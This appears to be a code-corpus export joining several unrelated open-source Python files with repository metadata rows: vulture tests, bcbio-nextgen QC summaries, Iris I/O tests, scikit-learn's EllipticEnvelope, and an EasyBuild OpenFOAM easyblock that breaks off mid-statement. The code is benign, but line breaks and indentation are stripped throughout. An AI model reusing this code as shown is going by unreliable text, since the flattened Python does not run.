import ast import os import pathlib import pytest from vulture import utils class TestFormatPath: @pytest.fixture def tmp_cwd(self, tmp_path, monkeypatch): cwd = tmp_path / "workingdir" cwd.mkdir() monkeypatch.chdir(cwd) return cwd def test_relative_inside(self): filepath = pathlib.Path("testfile.py") formatted = utils.format_path(filepath) assert formatted == filepath assert not formatted.is_absolute() def test_relative_outside(self, tmp_cwd): filepath = pathlib.Path(os.pardir) / "testfile.py" formatted = utils.format_path(filepath) assert formatted == filepath assert not formatted.is_absolute() def test_absolute_inside(self, tmp_cwd): filepath = tmp_cwd / "testfile.py" formatted = utils.format_path(filepath) assert formatted == pathlib.Path("testfile.py") assert not formatted.is_absolute() def test_absolute_outside(self, tmp_cwd): filepath = (tmp_cwd / os.pardir / "testfile.py").resolve() formatted = utils.format_path(filepath) assert formatted == filepath assert formatted.is_absolute() def check_decorator_names(code, expected_names): decorator_names = [] def visit_FunctionDef(node): for decorator in node.decorator_list: decorator_names.append(utils.get_decorator_name(decorator)) node_visitor = ast.NodeVisitor() node_visitor.visit_AsyncFunctionDef = visit_FunctionDef node_visitor.visit_ClassDef = visit_FunctionDef node_visitor.visit_FunctionDef = visit_FunctionDef node_visitor.visit(ast.parse(code)) assert expected_names == decorator_names def test_get_decorator_name_simple(): code = """\ @foobar def hoo(): pass """ check_decorator_names(code, ["@foobar"]) def test_get_decorator_name_call(): code = """\ @xyz() def bar(): pass """ check_decorator_names(code, ["@xyz"]) def test_get_decorator_name_async(): code = """\ @foo.bar.route('/foobar') async def async_function(request): print(request) """ check_decorator_names(code, ["@foo.bar.route"]) def test_get_decorator_name_multiple_attrs(): code = """\ @x.y.z def doo(): pass """ check_decorator_names(code, ["@x.y.z"]) def test_get_decorator_name_multiple_attrs_called(): code = """\ @a.b.c.d.foo("Foo and Bar") def hoofoo(): pass """ check_decorator_names(code, ["@a.b.c.d.foo"]) def test_get_decorator_name_multiple_decorators(): code = """\ @foo @bar() @x.y.z.a('foobar') def func(): pass """ check_decorator_names(code, ["@foo", "@bar", "@x.y.z.a"]) def test_get_decorator_name_class(): code = """\ @foo @bar.yz class Foo: pass """ check_decorator_names(code, ["@foo", "@bar.yz"])
jendrikseipp/vulture
tests/test_utils.py
Python
mit
2,812
[ "VisIt" ]
40cba9d51bd2e35c1dfe79a0586bc276ca17aaa4f4817e2ec4bd3198dfc7d0f1
"""Quality control and summary metrics for next-gen alignments and analysis. """ import collections import copy import csv import os import yaml from datetime import datetime import pandas as pd import glob import toolz as tz from bcbio import bam from bcbio import utils from bcbio.cwl import cwlutils from bcbio.log import logger from bcbio.pipeline import config_utils, run_info import bcbio.pipeline.datadict as dd from bcbio.provenance import do from bcbio.rnaseq import gtf from bcbio.variation import damage, peddy, vcfutils, vcfanno import six # ## High level functions to generate summary def qc_to_rec(samples): """CWL: Convert a set of input samples into records for parallelization. """ samples = [utils.to_single_data(x) for x in samples] samples = cwlutils.assign_complex_to_samples(samples) to_analyze, extras = _split_samples_by_qc(samples) recs = cwlutils.samples_to_records([utils.to_single_data(x) for x in to_analyze + extras]) return [[x] for x in recs] def generate_parallel(samples, run_parallel): """Provide parallel preparation of summary information for alignment and variant calling. """ to_analyze, extras = _split_samples_by_qc(samples) qced = run_parallel("pipeline_summary", to_analyze) samples = _combine_qc_samples(qced) + extras qsign_info = run_parallel("qsignature_summary", [samples]) metadata_file = _merge_metadata([samples]) summary_file = write_project_summary(samples, qsign_info) out = [] for data in samples: if "summary" not in data[0]: data[0]["summary"] = {} data[0]["summary"]["project"] = summary_file data[0]["summary"]["metadata"] = metadata_file if qsign_info: data[0]["summary"]["mixup_check"] = qsign_info[0]["out_dir"] out.append(data) out = _add_researcher_summary(out, summary_file) # MultiQC must be run after all file outputs are set: return [[utils.to_single_data(d)] for d in run_parallel("multiqc_summary", [out])] def pipeline_summary(data): """Provide summary information on processing sample. Handles standard and CWL (single QC output) cases. """ data = utils.to_single_data(data) if data["analysis"].startswith("wgbs-seq"): bismark_bam = dd.get_align_bam(data) sorted_bam = bam.sort(bismark_bam, data["config"]) data = dd.set_align_bam(data, sorted_bam) data = dd.set_work_bam(data, bismark_bam) work_bam = dd.get_align_bam(data) or dd.get_work_bam(data) if not work_bam or not work_bam.endswith(".bam"): work_bam = None if dd.get_ref_file(data): if work_bam or (tz.get_in(["config", "algorithm", "kraken"], data)): # kraken doesn't need bam logger.info("QC: %s %s" % (dd.get_sample_name(data), ", ".join(dd.get_algorithm_qc(data)))) work_data = cwlutils.unpack_tarballs(utils.deepish_copy(data), data) data["summary"] = _run_qc_tools(work_bam, work_data) if (len(dd.get_algorithm_qc(data)) == 1 and "output_cwl_keys" in data): data["summary"]["qc"] = data["summary"]["qc"].get(dd.get_algorithm_qc(data)[0]) return [[data]] def get_qc_tools(data): """Retrieve a list of QC tools to use based on configuration and analysis type. Uses defaults if previously set. """ if dd.get_algorithm_qc(data): return dd.get_algorithm_qc(data) analysis = data["analysis"].lower() to_run = [] if tz.get_in(["config", "algorithm", "kraken"], data): to_run.append("kraken") if "fastqc" not in dd.get_tools_off(data): to_run.append("fastqc") if any([tool in dd.get_tools_on(data) for tool in ["qualimap", "qualimap_full"]]): to_run.append("qualimap") if analysis.startswith("rna-seq") or analysis == "smallrna-seq": if "qualimap" not in dd.get_tools_off(data): if gtf.is_qualimap_compatible(dd.get_gtf_file(data)): to_run.append("qualimap_rnaseq") else: logger.debug("GTF not compatible with Qualimap, skipping.") if analysis.startswith("chip-seq"): to_run.append("chipqc") if dd.get_chip_method(data) == "atac": to_run.append("ataqv") if analysis.startswith("smallrna-seq"): to_run.append("small-rna") to_run.append("atropos") if "coverage_qc" not in dd.get_tools_off(data): to_run.append("samtools") if dd.has_variantcalls(data): if "coverage_qc" not in dd.get_tools_off(data): to_run += ["coverage", "picard"] to_run += ["qsignature", "variants"] if vcfanno.is_human(data): to_run += ["peddy"] if "contamination" not in dd.get_tools_off(data): to_run += ["contamination"] if vcfutils.get_paired_phenotype(data): if "viral" not in dd.get_tools_off(data): to_run += ["viral"] if damage.should_filter([data]): to_run += ["damage"] if dd.get_umi_consensus(data): to_run += ["umi"] if tz.get_in(["config", "algorithm", "preseq"], data): to_run.append("preseq") to_run = [tool for tool in to_run if tool not in dd.get_tools_off(data)] to_run.sort() return to_run def _run_qc_tools(bam_file, data): """Run a set of third party quality control tools, returning QC directory and metrics. :param bam_file: alignments in bam format :param data: dict with all configuration information :returns: dict with output of different tools """ from bcbio.qc import (atropos, contamination, coverage, damage, fastqc, kraken, qsignature, qualimap, samtools, picard, srna, umi, variant, viral, preseq, chipseq, atac) tools = {"fastqc": fastqc.run, "atropos": atropos.run, "small-rna": srna.run, "samtools": samtools.run, "qualimap": qualimap.run, "qualimap_rnaseq": qualimap.run_rnaseq, "qsignature": qsignature.run, "contamination": contamination.run, "coverage": coverage.run, "damage": damage.run, "variants": variant.run, "peddy": peddy.run_qc, "kraken": kraken.run, "picard": picard.run, "umi": umi.run, "viral": viral.run, "preseq": preseq.run, "chipqc": chipseq.run, "ataqv": atac.run } qc_dir = utils.safe_makedir(os.path.join(data["dirs"]["work"], "qc", data["description"])) metrics = {} qc_out = utils.deepish_copy(dd.get_summary_qc(data)) for program_name in dd.get_algorithm_qc(data): if not bam_file and program_name != "kraken": # kraken doesn't need bam continue if dd.get_phenotype(data) == "germline" and program_name != "variants": continue qc_fn = tools[program_name] cur_qc_dir = os.path.join(qc_dir, program_name) out = qc_fn(bam_file, data, cur_qc_dir) qc_files = None if out and isinstance(out, dict): # Check for metrics output, two cases: # 1. output with {"metrics"} and files ("base") if "metrics" in out: metrics.update(out.pop("metrics")) # 2. a dictionary of metrics elif "base" not in out: metrics.update(out) # Check for files only output if "base" in out: qc_files = out elif out and isinstance(out, six.string_types) and os.path.exists(out): qc_files = {"base": out, "secondary": []} if not qc_files: qc_files = _organize_qc_files(program_name, cur_qc_dir) if qc_files: qc_out[program_name] = qc_files metrics["Name"] = dd.get_sample_name(data) metrics["Quality format"] = dd.get_quality_format(data).lower() return {"qc": qc_out, "metrics": metrics} def _organize_qc_files(program, qc_dir): """Organize outputs from quality control runs into a base file and secondary outputs. Provides compatibility with CWL output. Returns None if no files created during processing. """ base_files = {"fastqc": "fastqc_report.html", "qualimap_rnaseq": "qualimapReport.html", "qualimap": "qualimapReport.html"} if os.path.exists(qc_dir): out_files = [] for fname in [os.path.join(qc_dir, x) for x in os.listdir(qc_dir)]: if os.path.isfile(fname) and not fname.endswith(".bcbiotmp"): out_files.append(fname) elif os.path.isdir(fname) and not fname.endswith("tx"): for root, dirs, files in os.walk(fname): for f in files: if not f.endswith(".bcbiotmp"): out_files.append(os.path.join(root, f)) if len(out_files) > 0 and all([not f.endswith("-failed.log") for f in out_files]): if len(out_files) == 1: base = out_files[0] secondary = [] else: base = None if program in base_files: base_choices = [x for x in out_files if x.endswith("/%s" % base_files[program])] if len(base_choices) == 1: base = base_choices[0] if not base: base = out_files[0] secondary = [x for x in out_files if x != base] return {"base": base, "secondary": secondary} # ## Allow parallelization for separate QC runs def _split_samples_by_qc(samples): """Split data into individual quality control steps for a run. """ to_process = [] extras = [] for data in [utils.to_single_data(x) for x in samples]: qcs = dd.get_algorithm_qc(data) # kraken doesn't need bam if qcs and (dd.get_align_bam(data) or dd.get_work_bam(data) or tz.get_in(["config", "algorithm", "kraken"], data)): for qc in qcs: add = copy.deepcopy(data) add["config"]["algorithm"]["qc"] = [qc] to_process.append([add]) else: extras.append([data]) return to_process, extras def _combine_qc_samples(samples): """Combine split QC analyses into single samples based on BAM files. """ by_bam = collections.defaultdict(list) for data in [utils.to_single_data(x) for x in samples]: batch = dd.get_batch(data) or dd.get_sample_name(data) if not isinstance(batch, (list, tuple)): batch = [batch] batch = tuple(batch) by_bam[(dd.get_align_bam(data) or dd.get_work_bam(data), batch)].append(data) out = [] for data_group in by_bam.values(): data = data_group[0] alg_qc = [] qc = {} metrics = {} for d in data_group: qc.update(dd.get_summary_qc(d)) metrics.update(dd.get_summary_metrics(d)) alg_qc.extend(dd.get_algorithm_qc(d)) data["config"]["algorithm"]["qc"] = alg_qc data["summary"]["qc"] = qc data["summary"]["metrics"] = metrics out.append([data]) return out # ## Generate project level QC summary for quickly assessing large projects def write_project_summary(samples, qsign_info=None): """Write project summary information on the provided samples. write out dirs, genome resources, """ work_dir = samples[0][0]["dirs"]["work"] out_file = os.path.join(work_dir, "project-summary.yaml") upload_dir = (os.path.join(work_dir, samples[0][0]["upload"]["dir"]) if "dir" in samples[0][0]["upload"] else "") date = str(datetime.now()) prev_samples = _other_pipeline_samples(out_file, samples) with open(out_file, "w") as out_handle: yaml.safe_dump({"date": date}, out_handle, default_flow_style=False, allow_unicode=False) if qsign_info: qsign_out = utils.deepish_copy(qsign_info[0]) qsign_out.pop("out_dir", None) yaml.safe_dump({"qsignature": qsign_out}, out_handle, default_flow_style=False, allow_unicode=False) yaml.safe_dump({"upload": upload_dir}, out_handle, default_flow_style=False, allow_unicode=False) yaml.safe_dump({"bcbio_system": samples[0][0]["config"].get("bcbio_system", "")}, out_handle, default_flow_style=False, allow_unicode=False) yaml.safe_dump({"samples": prev_samples + [_save_fields(sample[0]) for sample in samples]}, out_handle, default_flow_style=False, allow_unicode=False) return out_file def _merge_metadata(samples): """Merge all metadata into CSV file""" samples = list(utils.flatten(samples)) out_dir = dd.get_work_dir(samples[0]) logger.info("summarize metadata") out_file = os.path.join(out_dir, "metadata.csv") sample_metrics = collections.defaultdict(dict) for s in samples: m = tz.get_in(['metadata'], s) if isinstance(m, six.string_types): m = json.loads(m) if m: for me in list(m.keys()): if isinstance(m[me], list) or isinstance(m[me], dict) or isinstance(m[me], tuple): m.pop(me, None) sample_metrics[dd.get_sample_name(s)].update(m) pd.DataFrame(sample_metrics).transpose().to_csv(out_file) return out_file def _other_pipeline_samples(summary_file, cur_samples): """Retrieve samples produced previously by another pipeline in the summary output. """ cur_descriptions = set([s[0]["description"] for s in cur_samples]) out = [] if utils.file_exists(summary_file): with open(summary_file) as in_handle: for s in yaml.safe_load(in_handle).get("samples", []): if s["description"] not in cur_descriptions: out.append(s) return out def _save_fields(sample): to_save = ["dirs", "genome_resources", "genome_build", "sam_ref", "metadata", "description"] saved = {k: sample[k] for k in to_save if k in sample} if "summary" in sample and "metrics" in sample["summary"]: saved["summary"] = {"metrics": sample["summary"]["metrics"]} return saved # ## Generate researcher specific summaries def _add_researcher_summary(samples, summary_yaml): """Generate summary files per researcher if organized via a LIMS. """ by_researcher = collections.defaultdict(list) for data in (x[0] for x in samples): researcher = utils.get_in(data, ("upload", "researcher")) if researcher: by_researcher[researcher].append(data["description"]) out_by_researcher = {} for researcher, descrs in by_researcher.items(): out_by_researcher[researcher] = _summary_csv_by_researcher(summary_yaml, researcher, set(descrs), samples[0][0]) out = [] for data in (x[0] for x in samples): researcher = utils.get_in(data, ("upload", "researcher")) if researcher: data["summary"]["researcher"] = out_by_researcher[researcher] out.append([data]) return out def _summary_csv_by_researcher(summary_yaml, researcher, descrs, data): """Generate a CSV file with summary information for a researcher on this project. """ out_file = os.path.join(utils.safe_makedir(os.path.join(data["dirs"]["work"], "researcher")), "%s-summary.tsv" % run_info.clean_name(researcher)) metrics = ["Total_reads", "Mapped_reads", "Mapped_reads_pct", "Duplicates", "Duplicates_pct"] with open(summary_yaml) as in_handle: with open(out_file, "w") as out_handle: writer = csv.writer(out_handle, dialect="excel-tab") writer.writerow(["Name"] + metrics) for sample in yaml.safe_load(in_handle)["samples"]: if sample["description"] in descrs: row = [sample["description"]] + [utils.get_in(sample, ("summary", "metrics", x), "") for x in metrics] writer.writerow(row) return out_file # ## Galaxy functionality def prep_pdf(qc_dir, config): """Create PDF from HTML summary outputs in QC directory. Requires wkhtmltopdf installed: http://www.msweet.org/projects.php?Z1 Thanks to: https://www.biostars.org/p/16991/ Works around issues with CSS conversion on CentOS by adjusting CSS. """ html_file = os.path.join(qc_dir, "fastqc", "fastqc_report.html") html_fixed = "%s-fixed%s" % os.path.splitext(html_file) try: topdf = config_utils.get_program("wkhtmltopdf", config) except config_utils.CmdNotFound: topdf = None if topdf and utils.file_exists(html_file): out_file = "%s.pdf" % os.path.splitext(html_file)[0] if not utils.file_exists(out_file): cmd = ("sed 's/div.summary/div.summary-no/' %s | sed 's/div.main/div.main-no/' > %s" % (html_file, html_fixed)) do.run(cmd, "Fix fastqc CSS to be compatible with wkhtmltopdf") cmd = [topdf, html_fixed, out_file] do.run(cmd, "Convert QC HTML to PDF") return out_file
lbeltrame/bcbio-nextgen
bcbio/pipeline/qcsummary.py
Python
mit
17,471
[ "Galaxy" ]
ec974f5b9105a0bb834264f2210837ef8955ee76fdee6b36eeead3ef1b5ee70f
# (C) British Crown Copyright 2010 - 2015, Met Office # # This file is part of Iris. # # Iris is free software: you can redistribute it and/or modify it under # the terms of the GNU Lesser General Public License as published by the # Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Iris is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with Iris. If not, see <http://www.gnu.org/licenses/>. """ Test the io/__init__.py module. """ from __future__ import (absolute_import, division, print_function) from six.moves import (filter, input, map, range, zip) # noqa # import iris tests first so that some things can be initialised before importing anything else import iris.tests as tests import unittest from io import BytesIO import iris.fileformats as iff import iris.io class TestDecodeUri(unittest.TestCase): def test_decode_uri(self): tests = { '/data/local/someDir/PP/COLPEX/COLPEX_16a_pj001.pp': ( 'file', '/data/local/someDir/PP/COLPEX/COLPEX_16a_pj001.pp' ), 'C:\data\local\someDir\PP\COLPEX\COLPEX_16a_pj001.pp': ( 'file', 'C:\data\local\someDir\PP\COLPEX\COLPEX_16a_pj001.pp' ), 'file:///data/local/someDir/PP/COLPEX/COLPEX_16a_pj001.pp': ( 'file', '///data/local/someDir/PP/COLPEX/COLPEX_16a_pj001.pp' ), 'http://www.somehost.com:8080/resource/thing.grib': ( 'http', '//www.somehost.com:8080/resource/thing.grib' ), '/data/local/someDir/2013-11-25T13:49:17.632797': ( 'file', '/data/local/someDir/2013-11-25T13:49:17.632797' ), } for uri, pair in tests.items(): self.assertEqual(pair, iris.io.decode_uri(uri)) class TestFileFormatPicker(tests.IrisTest): def test_known_formats(self): self.assertString(str(iff.FORMAT_AGENT), tests.get_result_path(('file_load', 'known_loaders.txt'))) @tests.skip_data def test_format_picker(self): # ways to test the format picker = list of (format-name, file-spec) test_specs = [ ('NetCDF', ['NetCDF', 'global', 'xyt', 'SMALL_total_column_co2.nc']), ('NetCDF 64 bit offset format', ['NetCDF', 'global', 'xyt', 'SMALL_total_column_co2.nc.k2']), ('NetCDF_v4', ['NetCDF', 'global', 'xyt', 'SMALL_total_column_co2.nc4.k3']), ('NetCDF_v4', ['NetCDF', 'global', 'xyt', 'SMALL_total_column_co2.nc4.k4']), ('UM Fieldsfile (FF) post v5.2', ['FF', 'n48_multi_field']), ('GRIB', ['GRIB', 'grib1_second_order_packing', 'GRIB_00008_FRANX01']), ('GRIB', ['GRIB', 'jpeg2000', 'file.grib2']), ('UM Post Processing file (PP)', ['PP', 'simple_pp', 'global.pp']), ('UM Fieldsfile (FF) ancillary', ['FF', 'ancillary_fixed_length_header']), # ('BUFR', # ['BUFR', 'mss', 'BUFR_Samples', # 'JUPV78_EGRR_121200_00002501']), ('NIMROD', ['NIMROD', 'uk2km', 'WO0000000003452', '201007020900_u1096_ng_ey00_visibility0180_screen_2km']), # ('NAME', # ['NAME', '20100509_18Z_variablesource_12Z_VAAC', # 'Fields_grid1_201005110000.txt']), ] # test that each filespec is identified as the expected format for (expected_format_name, file_spec) in test_specs: test_path = tests.get_data_path(file_spec) with open(test_path, 'rb') as test_file: a = iff.FORMAT_AGENT.get_spec(test_path, test_file) self.assertEqual(a.name, expected_format_name) def test_format_picker_nodata(self): # The following is to replace the above at some point as no real files # are required. # (Used binascii.unhexlify() to convert from hex to binary) # Packaged grib, magic number offset by set length, this length is # specific to WMO bulletin headers header_lengths = [21, 80, 41, 42] for header_length in header_lengths: binary_string = header_length * b'\x00' + b'GRIB' + b'\x00' * 100 with BytesIO(b'rw') as bh: bh.write(binary_string) bh.name = 'fake_file_handle' a = iff.FORMAT_AGENT.get_spec(bh.name, bh) self.assertEqual(a.name, 'GRIB') def test_open_dap(self): # tests that *ANY* http or https URL is seen as an OPeNDAP service. # This may need to change in the future if other protocols are # supported. DAP_URI = 'http://geoport.whoi.edu/thredds/dodsC/bathy/gom15' a = iff.FORMAT_AGENT.get_spec(DAP_URI, None) self.assertEqual(a.name, 'NetCDF OPeNDAP') @tests.skip_data class TestFileExceptions(tests.IrisTest): def test_pp_little_endian(self): filename = tests.get_data_path(('PP', 'aPPglob1', 'global_little_endian.pp')) self.assertRaises(ValueError, iris.load_cube, filename) if __name__ == '__main__': tests.main()
ghislainp/iris
lib/iris/tests/test_io_init.py
Python
gpl-3.0
5,591
[ "NetCDF" ]
6d393c40c89bb47eb46330e51a47cdeee582cf933658473694329ba668dc84aa
""" Class for outlier detection. This class provides a framework for outlier detection. It consists in several methods that can be added to a covariance estimator in order to assess the outlying-ness of the observations of a data set. Such a "outlier detector" object is proposed constructed from a robust covariance estimator (the Minimum Covariance Determinant). """ # Author: Virgile Fritsch <virgile.fritsch@inria.fr> # # License: BSD 3 clause import warnings import numpy as np import scipy as sp from . import MinCovDet from ..base import ClassifierMixin from ..utils.validation import check_is_fitted class OutlierDetectionMixin(object): """Set of methods for outliers detection with covariance estimators. Parameters ---------- contamination : float, 0. < contamination < 0.5 The amount of contamination of the data set, i.e. the proportion of outliers in the data set. Notes ----- Outlier detection from covariance estimation may break or not perform well in high-dimensional settings. In particular, one will always take care to work with ``n_samples > n_features ** 2``. """ def __init__(self, contamination=0.1): self.contamination = contamination def decision_function(self, X, raw_values=False): """Compute the decision function of the given observations. Parameters ---------- X : array-like, shape (n_samples, n_features) raw_values : bool Whether or not to consider raw Mahalanobis distances as the decision function. Must be False (default) for compatibility with the others outlier detection tools. Returns ------- decision : array-like, shape (n_samples, ) The values of the decision function for each observations. It is equal to the Mahalanobis distances if `raw_values` is True. By default (``raw_values=True``), it is equal to the cubic root of the shifted Mahalanobis distances. In that case, the threshold for being an outlier is 0, which ensures a compatibility with other outlier detection tools such as the One-Class SVM. """ check_is_fitted(self, 'threshold_') mahal_dist = self.mahalanobis(X) if raw_values: decision = mahal_dist else: check_is_fitted(self, 'threshold_') transformed_mahal_dist = mahal_dist ** 0.33 decision = self.threshold_ ** 0.33 - transformed_mahal_dist return decision def predict(self, X): """Outlyingness of observations in X according to the fitted model. Parameters ---------- X : array-like, shape = (n_samples, n_features) Returns ------- is_outliers : array, shape = (n_samples, ), dtype = bool For each observations, tells whether or not it should be considered as an outlier according to the fitted model. threshold : float, The values of the less outlying point's decision function. """ check_is_fitted(self, 'threshold_') is_inlier = -np.ones(X.shape[0], dtype=int) if self.contamination is not None: values = self.decision_function(X, raw_values=True) is_inlier[values <= self.threshold_] = 1 else: raise NotImplementedError("You must provide a contamination rate.") return is_inlier @property def threshold(self): warnings.warn(("The threshold attribute is renamed to threshold_ from " "0.16 onwards and will be removed in 0.18"), DeprecationWarning, stacklevel=1) return getattr(self, 'threshold_', None) class EllipticEnvelope(ClassifierMixin, OutlierDetectionMixin, MinCovDet): """An object for detecting outliers in a Gaussian distributed dataset. Attributes ---------- `contamination` : float, 0. < contamination < 0.5 The amount of contamination of the data set, i.e. the proportion of \ outliers in the data set. location_ : array-like, shape (n_features,) Estimated robust location covariance_ : array-like, shape (n_features, n_features) Estimated robust covariance matrix precision_ : array-like, shape (n_features, n_features) Estimated pseudo inverse matrix. (stored only if store_precision is True) support_ : array-like, shape (n_samples,) A mask of the observations that have been used to compute the robust estimates of location and shape. Parameters ---------- store_precision : bool Specify if the estimated precision is stored. assume_centered : Boolean If True, the support of robust location and covariance estimates is computed, and a covariance estimate is recomputed from it, without centering the data. Useful to work with data whose mean is significantly equal to zero but is not exactly zero. If False, the robust location and covariance are directly computed with the FastMCD algorithm without additional treatment. support_fraction : float, 0 < support_fraction < 1 The proportion of points to be included in the support of the raw MCD estimate. Default is ``None``, which implies that the minimum value of support_fraction will be used within the algorithm: `[n_sample + n_features + 1] / 2`. contamination : float, 0. < contamination < 0.5 The amount of contamination of the data set, i.e. the proportion of outliers in the data set. See Also -------- EmpiricalCovariance, MinCovDet Notes ----- Outlier detection from covariance estimation may break or not perform well in high-dimensional settings. In particular, one will always take care to work with ``n_samples > n_features ** 2``. References ---------- .. [1] Rousseeuw, P.J., Van Driessen, K. "A fast algorithm for the minimum covariance determinant estimator" Technometrics 41(3), 212 (1999) """ def __init__(self, store_precision=True, assume_centered=False, support_fraction=None, contamination=0.1, random_state=None): MinCovDet.__init__(self, store_precision=store_precision, assume_centered=assume_centered, support_fraction=support_fraction, random_state=random_state) OutlierDetectionMixin.__init__(self, contamination=contamination) def fit(self, X, y=None): MinCovDet.fit(self, X) self.threshold_ = sp.stats.scoreatpercentile( self.dist_, 100. * (1. - self.contamination)) return self
shikhardb/scikit-learn
sklearn/covariance/outlier_detection.py
Python
bsd-3-clause
6,856
[ "Gaussian" ]
63f02484b5c19293512c35e0d988a822d8a5bef8bbb24b8cb2dfb5586a03ecca
## # Copyright 2009-2015 Ghent University # # This file is part of EasyBuild, # originally created by the HPC team of Ghent University (http://ugent.be/hpc/en), # with support of Ghent University (http://ugent.be/hpc), # the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en), # the Hercules foundation (http://www.herculesstichting.be/in_English) # and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en). # # http://github.com/hpcugent/easybuild # # EasyBuild is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation v2. # # EasyBuild is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with EasyBuild. If not, see <http://www.gnu.org/licenses/>. ## """ EasyBuild support for building and installing OpenFOAM, implemented as an easyblock @author: Stijn De Weirdt (Ghent University) @author: Dries Verdegem (Ghent University) @author: Kenneth Hoste (Ghent University) @author: Pieter De Baets (Ghent University) @author: Jens Timmerman (Ghent University) @author: Xavier Besseron (University of Luxembourg) """ import os import shutil import stat from distutils.version import LooseVersion import easybuild.tools.environment as env import easybuild.tools.toolchain as toolchain from easybuild.framework.easyblock import EasyBlock from easybuild.tools.build_log import EasyBuildError from easybuild.tools.filetools import adjust_permissions, mkdir from easybuild.tools.modules import get_software_root from easybuild.tools.run import run_cmd, run_cmd_qa class EB_OpenFOAM(EasyBlock): """Support for building and installing OpenFOAM.""" def __init__(self,*args,**kwargs): """Specify that OpenFOAM should be built in install dir.""" super(EB_OpenFOAM, self).__init__(*args, **kwargs) self.build_in_installdir = True self.wm_compiler= None self.wm_mplib = None self.openfoamdir = None self.thrdpartydir = None if 'extend' in self.name.lower(): if LooseVersion(self.version) >= LooseVersion('3.0'): self.openfoamdir = 'foam-extend-%s' % self.version else: self.openfoamdir = 'OpenFOAM-%s-ext' % self.version else: self.openfoamdir = '-'.join([self.name, '-'.join(self.version.split('-')[:2])]) self.log.debug("openfoamdir: %s" % self.openfoamdir) def extract_step(self): """Extract sources as expected by the OpenFOAM(-Extend) build scripts.""" super(EB_OpenFOAM, self).extract_step() # make sure that the expected subdir is really there after extracting # if not, the build scripts (e.g., the etc/bashrc being sourced) will likely fail openfoam_installdir = os.path.join(self.installdir, self.openfoamdir) if not os.path.exists(openfoam_installdir): self.log.warning("Creating expected directory %s, and moving everything there" % openfoam_installdir) try: mkdir(openfoam_installdir) for fil in os.listdir(self.installdir): if fil != self.openfoamdir: source = os.path.join(self.installdir, fil) target = os.path.join(openfoam_installdir, fil) self.log.debug("Moving %s to %s" % (source, target)) shutil.move(source, target) os.chdir(openfoam_installdir) except OSError, err: raise EasyBuildError("Failed to move all files to %s: %s", openfoam_installdir, err) def configure_step(self): """Configure OpenFOAM build by setting appropriate environment variables.""" # enable verbose build for debug purposes env.setvar("FOAM_VERBOSE", "1") # installation directory env.setvar("FOAM_INST_DIR", self.installdir) # third party directory self.thrdpartydir = "ThirdParty-%s" % self.version # only if third party stuff is actually installed if os.path.exists(self.thrdpartydir): os.symlink(os.path.join("..", self.thrdpartydir), self.thrdpartydir) env.setvar("WM_THIRD_PARTY_DIR", os.path.join(self.installdir, self.thrdpartydir)) # compiler comp_fam = self.toolchain.comp_family() if comp_fam == toolchain.GCC: #@UndefinedVariable self.wm_compiler="Gcc" elif comp_fam == toolchain.INTELCOMP: #@UndefinedVariable self.wm_compiler="Icc" # make sure -no-prec-div is used with Intel compilers self.cfg.update('prebuildopts', 'CFLAGS="$CFLAGS -no-prec-div" CXXFLAGS="$CXXFLAGS -no-prec-div"') else: raise EasyBuildError("Unknown compiler family, don't know how to set WM_COMPILER") env.setvar("WM_COMPILER", self.wm_compiler) # set to an MPI unknown by OpenFOAM, since we're handling the MPI settings ourselves (via mpicc, etc.) # Note: this name must contain 'MPI' so the MPI version of the Pstream library is built (cf src/Pstream/Allwmake) self.wm_mplib = "EASYBUILDMPI" env.setvar("WM_MPLIB", self.wm_mplib) # parallel build spec env.setvar("WM_NCOMPPROCS", str(self.cfg['parallel'])) # make sure lib/include dirs for dependencies are found openfoam_extend_v3 = 'extend' in self.name.lower() and LooseVersion(self.version) >= LooseVersion('3.0') if LooseVersion(self.version) < LooseVersion("2") or openfoam_extend_v3: self.log.debug("List of deps: %s" % self.cfg.dependencies()) for dep in self.cfg.dependencies(): self.cfg.update('prebuildopts', "%s_SYSTEM=1" % dep['name'].upper()) self.cfg.update('prebuildopts', "%(name)s_LIB_DIR=$EBROOT%(name)s/lib" % {'name': dep['name'].upper()}) self.cfg.update('prebuildopts', "%(name)s_INCLUDE_DIR=$EBROOT%(name)s/include" % {'name': dep['name'].upper()}) else: scotch = get_software_root('SCOTCH') if scotch: self.cfg.update('prebuildopts', "SCOTCH_ROOT=$EBROOTSCOTCH") def build_step(self): """Build OpenFOAM using make after sourcing script to set environment.""" precmd = "source %s" % os.path.join(self.builddir, self.openfoamdir, "etc", "bashrc") # make directly in install directory cmd_tmpl = "%(precmd)s && %(prebuildopts)s %(makecmd)s" % { 'precmd': precmd, 'prebuildopts': self.cfg['prebuildopts'], 'makecmd': os.path.join(self.builddir, self.openfoamdir, '%s'), } if 'extend' in self.name.lower() and LooseVersion(self.version) >= LooseVersion('3.0'): qa = { "Proceed without compiling ParaView [Y/n]": 'Y', "Proceed without compiling cudaSolvers? [Y/n]": 'Y', } noqa = [ ".* -o .*", "checking .*", "warning.*", "configure: creating.*", "%s .*" % os.environ['CC'], "wmake .*", "Making dependency list for source file.*", "\s*\^\s*", # warning indicator "Cleaning .*", ] run_cmd_qa(cmd_tmpl % 'Allwmake.firstInstall', qa, no_qa=noqa, log_all=True, simple=True) else: run_cmd(cmd_tmpl % 'Allwmake', log_all=True, simple=True, log_output=True) def install_step(self): """Building was performed in install dir, so just fix permissions.""" # fix permissions of OpenFOAM dir fullpath = os.path.join(self.installdir, self.openfoamdir) adjust_permissions(fullpath, stat.S_IROTH, add=True, recursive=True, ignore_errors=True) adjust_permissions(fullpath, stat.S_IXOTH, add=True, recursive=True, onlydirs=True, ignore_errors=True) # fix permissions of ThirdParty dir and subdirs (also for 2.x) # if the thirdparty tarball is installed fullpath = os.path.join(self.installdir, self.thrdpartydir) if os.path.exists(fullpath): adjust_permissions(fullpath, stat.S_IROTH, add=True, recursive=True, ignore_errors=True) adjust_permissions(fullpath, 